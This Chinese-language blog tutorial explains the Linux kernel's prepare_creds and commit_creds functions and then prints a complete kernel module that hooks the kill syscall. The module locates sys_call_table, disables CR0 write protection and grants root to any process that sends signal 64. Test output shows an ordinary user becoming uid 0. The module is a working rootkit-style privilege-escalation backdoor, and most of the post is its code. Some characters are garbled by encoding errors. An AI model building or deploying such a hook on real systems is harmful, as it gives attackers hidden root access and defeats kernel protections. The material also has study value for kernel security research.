前言

在這篇文章：Linux 安全 - Credentials 介紹了 Task Credentials 相關的知識點，接下來給出一個內核編程提權的例程。

一、簡介

內核模塊提權主要借助于 prepare_creds 函數(shù)和 commit_creds 函數(shù)，簡單代碼示例如下：

void set_root(void)
{struct cred *root;root = prepare_creds();if (root == NULL)return;/* Set the credentials to root */commit_creds(root);
}

struct cred {kuid_t		uid;		/* real UID of the task */kgid_t		gid;		/* real GID of the task */kuid_t		suid;		/* saved UID of the task */kgid_t		sgid;		/* saved GID of the task */kuid_t		euid;		/* effective UID of the task */kgid_t		egid;		/* effective GID of the task */kuid_t		fsuid;		/* UID for VFS ops */kgid_t		fsgid;		/* GID for VFS ops */
}

在set_root函數(shù)中把struct cred 以上成員改為0。

/* Whatever calls this function will have it's creds struct replaced* with root's */
void set_root(void)
{/* prepare_creds returns the current credentials of the process */struct cred *root;root = prepare_creds();if (root == NULL)return;/* Run through and set all the various *id's to 0 (root) */root->uid.val = root->gid.val = 0;root->euid.val = root->egid.val = 0;root->suid.val = root->sgid.val = 0;root->fsuid.val = root->fsgid.val = 0;/* Set the cred struct that we've modified to that of the calling process */commit_creds(root);
}

1.1 prepare_creds

static struct kmem_cache *cred_jar;

/*** prepare_creds - Prepare a new set of credentials for modification** Prepare a new set of task credentials for modification.  A task's creds* shouldn't generally be modified directly, therefore this function is used to* prepare a new copy, which the caller then modifies and then commits by* calling commit_creds().** Preparation involves making a copy of the objective creds for modification.** Returns a pointer to the new creds-to-be if successful, NULL otherwise.** Call commit_creds() or abort_creds() to clean up.*/
struct cred *prepare_creds(void)
{struct task_struct *task = current;const struct cred *old;struct cred *new;validate_process_creds();new = kmem_cache_alloc(cred_jar, GFP_KERNEL);if (!new)return NULL;kdebug("prepare_creds() alloc %p", new);old = task->cred;memcpy(new, old, sizeof(struct cred));new->non_rcu = 0;atomic_set(&new->usage, 1);set_cred_subscribers(new, 0);get_group_info(new->group_info);get_uid(new->user);get_user_ns(new->user_ns);#ifdef CONFIG_KEYSkey_get(new->session_keyring);key_get(new->process_keyring);key_get(new->thread_keyring);key_get(new->request_key_auth);
#endif#ifdef CONFIG_SECURITYnew->security = NULL;
#endifif (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)goto error;validate_creds(new);return new;error:abort_creds(new);return NULL;
}
EXPORT_SYMBOL(prepare_creds);

prepare_creds() 函數(shù)的目的是為修改準備一個新的任務憑證集。它設計為創(chuàng)建現(xiàn)有憑證的副本，以便調用者可以在不直接修改原始憑證的情況下修改副本。這確保了在使用 commit_creds() 提交之前，原始憑證保持不變。

函數(shù)源碼解析：
（1）內存分配：該函數(shù)使用 kmem_cache_alloc() 為新憑證結構（new）分配內存。它利用了 cred_jar 內存緩存，這是一個預分配的憑證內存池。這有助于通過避免頻繁的動態(tài)內存分配來提高性能。

（2）復制現(xiàn)有憑證：函數(shù)使用 memcpy() 將現(xiàn)有憑證（old）的內容復制到新分配的憑證（new）中。這創(chuàng)建了一個初始的憑證副本，可以獨立地進行修改。

（3）設置憑證屬性：在復制現(xiàn)有憑證之后，函數(shù)為新憑證設置各種屬性。這些屬性包括 non_rcu（設置為 0）、usage（設置為 1，表示對憑證的一個引用）以及與組信息、用戶標識符和用戶命名空間相關的其他字段。

（4）密鑰管理：如果內核配置選項 CONFIG_KEYS 已啟用，函數(shù)調用 key_get() 來增加憑證結構中與密鑰相關字段的引用計數(shù)。這確保了與憑證關聯(lián)的密鑰得到正確的計數(shù)，避免了過早釋放。

（5）安全模塊集成：如果內核配置選項 CONFIG_SECURITY 已啟用，新憑證的 security 字段將設置為 NULL。該字段通常用于存儲與憑證關聯(lián)的安全模塊特定數(shù)據(jù)的引用。

（6）安全模塊鉤子：函數(shù)調用安全模塊提供的 security_prepare_creds() 鉤子。這允許安全模塊對新憑證執(zhí)行任何必要的操作或驗證。如果安全模塊返回小于 0 的值，表示發(fā)生錯誤，函數(shù)跳轉到 error 標簽處處理錯誤并進行清理。

（7）驗證：在準備新憑證之后，函數(shù)調用 validate_creds() 來驗證新憑證結構的完整性和一致性。

（8）返回值：如果準備成功，函數(shù)返回新憑證的指針（new）。如果在準備過程中發(fā)生任何錯誤，函數(shù)調用 abort_creds() 釋放已分配的內存，并返回 NULL。

通過結合使用 prepare_creds() 和 commit_creds()，Linux 內核提供了一個安全的機制，在修改任務憑證時保持原始憑證不變，直到更改被提交。這是內核安全基礎設施的重要組成部分，允許對系統(tǒng)內的訪問權限和特權進行細粒度控制。

1.2 commit_creds

/*** commit_creds - Install new credentials upon the current task* @new: The credentials to be assigned** Install a new set of credentials to the current task, using RCU to replace* the old set.  Both the objective and the subjective credentials pointers are* updated.  This function may not be called if the subjective credentials are* in an overridden state.** This function eats the caller's reference to the new credentials.** Always returns 0 thus allowing this function to be tail-called at the end* of, say, sys_setgid().*/
int commit_creds(struct cred *new)
{struct task_struct *task = current;const struct cred *old = task->real_cred;kdebug("commit_creds(%p{%d,%d})", new,atomic_read(&new->usage),read_cred_subscribers(new));BUG_ON(task->cred != old);
#ifdef CONFIG_DEBUG_CREDENTIALSBUG_ON(read_cred_subscribers(old) < 2);validate_creds(old);validate_creds(new);
#endifBUG_ON(atomic_read(&new->usage) < 1);get_cred(new); /* we will require a ref for the subj creds too *//* dumpability changes */if (!uid_eq(old->euid, new->euid) ||!gid_eq(old->egid, new->egid) ||!uid_eq(old->fsuid, new->fsuid) ||!gid_eq(old->fsgid, new->fsgid) ||!cred_cap_issubset(old, new)) {if (task->mm)set_dumpable(task->mm, suid_dumpable);task->pdeath_signal = 0;/** If a task drops privileges and becomes nondumpable,* the dumpability change must become visible before* the credential change; otherwise, a __ptrace_may_access()* racing with this change may be able to attach to a task it* shouldn't be able to attach to (as if the task had dropped* privileges without becoming nondumpable).* Pairs with a read barrier in __ptrace_may_access().*/smp_wmb();}/* alter the thread keyring */if (!uid_eq(new->fsuid, old->fsuid))key_fsuid_changed(new);if (!gid_eq(new->fsgid, old->fsgid))key_fsgid_changed(new);/* do it* RLIMIT_NPROC limits on user->processes have already been checked* in set_user().*/alter_cred_subscribers(new, 2);if (new->user != old->user)atomic_inc(&new->user->processes);rcu_assign_pointer(task->real_cred, new);rcu_assign_pointer(task->cred, new);if (new->user != old->user)atomic_dec(&old->user->processes);alter_cred_subscribers(old, -2);/* send notifications */if (!uid_eq(new->uid,   old->uid)  ||!uid_eq(new->euid,  old->euid) ||!uid_eq(new->suid,  old->suid) ||!uid_eq(new->fsuid, old->fsuid))proc_id_connector(task, PROC_EVENT_UID);if (!gid_eq(new->gid,   old->gid)  ||!gid_eq(new->egid,  old->egid) ||!gid_eq(new->sgid,  old->sgid) ||!gid_eq(new->fsgid, old->fsgid))proc_id_connector(task, PROC_EVENT_GID);/* release the old obj and subj refs both */put_cred(old);put_cred(old);return 0;
}
EXPORT_SYMBOL(commit_creds);

commit_creds() 負責處理進程的憑證安裝。它確保憑證的一致性和完整性，更新各種屬性，并在必要時發(fā)送通知。

二、demo

源代碼來自于：https://github.com/chronolator/LKM-SetRootPerms

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/version.h>#define LICENSE			"GPL"
#define AUTHOR			"Chronolator"
#define DESCRIPTION		"LKM example of setting process to root perms."
#define VERSION			"0.01"/* Module meta data */
MODULE_LICENSE(LICENSE);
MODULE_AUTHOR(AUTHOR);
MODULE_DESCRIPTION(DESCRIPTION);
MODULE_VERSION(VERSION);/* Preprocessing Definitions */
#define MODULE_NAME "SetRootPerms"
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0)#define KPROBE_LOOKUP 1#include <linux/kprobes.h>static struct kprobe kp = {.symbol_name = "kallsyms_lookup_name"};
#endif/* Global Variables */
unsigned long cr0;
static unsigned long *__sys_call_table;/* Function Prototypes*/
unsigned long *get_syscall_table_bf(void);
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)static inline void write_cr0_forced(unsigned long val);
#endif
static inline void SetProtectedMode(void);
static inline void SetRealMode(void);
void give_root(void);
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)typedef asmlinkage long (*t_syscall)(const struct pt_regs *regs);static t_syscall original_kill;//asmlinkage long (*original_kill)(const struct pt_regs *regs); //OLDasmlinkage long hacked_kill(const struct pt_regs *regs);
#elsetypedef asmlinkage long (*original_kill_t)(pid_t, int);original_kill_t original_kill;//asmlinkage long (*original_kill)(int pid, int sig); //OLDasmlinkage long hacked_kill(int pid, int sig);
#endif/* Get syscall table */
unsigned long *get_syscall_table_bf(void) {unsigned long *syscall_table;#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0)#ifdef KPROBE_LOOKUPtypedef unsigned long (*kallsyms_lookup_name_t)(const char *name);kallsyms_lookup_name_t kallsyms_lookup_name;register_kprobe(&kp);kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;unregister_kprobe(&kp);#endifsyscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");return syscall_table;#elseunsigned long int i;for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) {syscall_table = (unsigned long *)i;if (syscall_table[__NR_close] == (unsigned long)sys_close)return syscall_table;}return NULL;#endif
}/* Bypass write_cr0() restrictions by writing directly to the cr0 register */
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
static inline void write_cr0_forced(unsigned long val) {unsigned long __force_order;asm volatile("mov %0, %%cr0": "+r"(val), "+m"(__force_order));
}
#endif/* Set CPU to protected mode by modifying value stored in cr0 register */
static inline void SetProtectedMode(void) {
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)write_cr0_forced(cr0);
#elsewrite_cr0(cr0);
#endif
}/* Set CPU to real mode by modifying value stored in cr0 register */
static inline void SetRealMode(void) {
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)write_cr0_forced(cr0 & ~0x00010000);
#elsewrite_cr0(cr0 & ~0x00010000);
#endif
}/* Misc Functions */
void give_root(void) {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)current->uid = current->gid = 0;current->euid = current->egid = 0;current->suid = current->sgid = 0;current->fsuid = current->fsgid = 0;
#elsestruct cred *newcreds;newcreds = prepare_creds();if (newcreds == NULL)return;#if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0) && defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS) || LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0)newcreds->uid.val = newcreds->gid.val = 0;newcreds->euid.val = newcreds->egid.val = 0;newcreds->suid.val = newcreds->sgid.val = 0;newcreds->fsuid.val = newcreds->fsgid.val = 0;#elsenewcreds->uid = newcreds->gid = 0;newcreds->euid = newcreds->egid = 0;newcreds->suid = newcreds->sgid = 0;newcreds->fsuid = newcreds->fsgid = 0;#endifcommit_creds(newcreds);
#endif
}/* Hacked Syscalls */
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
asmlinkage long hacked_kill(const struct pt_regs *regs) {printk(KERN_WARNING "%s module: Called syscall kill using new pt_regs", MODULE_NAME);pid_t pid = regs->di;int sig = regs->si;if(sig == 64) {printk(KERN_INFO "%s module: Giving root\n", MODULE_NAME);give_root();        return 0;}return (*original_kill)(regs);
}
#else
asmlinkage long hacked_kill(pid_t pid, int sig) {printk(KERN_WARNING "%s module: Called syscall kill", MODULE_NAME);//struct task_struct *task;if(sig == 64) {printk(KERN_INFO "%s module: Giving root using old asmlinkage\n", MODULE_NAME);give_root(); return 0;}return (*original_kill)(pid, sig);
}
#endif/* Init */
static int __init run_init(void) {printk(KERN_INFO "%s module: Initializing module\n", MODULE_NAME);// Get syscall table __sys_call_table = get_syscall_table_bf();if (!__sys_call_table)return -1;// Get the value in the cr0 registercr0 = read_cr0();// Set the actual syscalls to the "original" linked versions (save the actual in another variable)#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)original_kill = (t_syscall)__sys_call_table[__NR_kill];//original_kill = (original_kill)__sys_call_table[__NR_kill]; //OLD#elseoriginal_kill = (original_kill_t)__sys_call_table[__NR_kill];//original_kill = (void*)__sys_call_table[__NR_kill]; //OLD#endif// Set the syscalls to your modified versionsSetRealMode();__sys_call_table[__NR_kill] = (unsigned long)hacked_kill;SetProtectedMode();return 0;
}/* Exit */
static void __exit run_exit(void) {printk(KERN_INFO "%s module: Exiting module\n", MODULE_NAME);// Set the syscalls back to the "original" linked versionsSetRealMode();__sys_call_table[__NR_kill] = (unsigned long)original_kill;SetProtectedMode();return;
}module_init(run_init);
module_exit(run_exit);

測試結果：

$ id
uid=1000(yl) gid=1000(yl) 
$ kill -64 0
$ id
uid=0(root) gid=0(root) 

參考資料

https://github.com/chronolator/LKM-SetRootPerms
https://xcellerator.github.io/posts/linux_rootkits_03/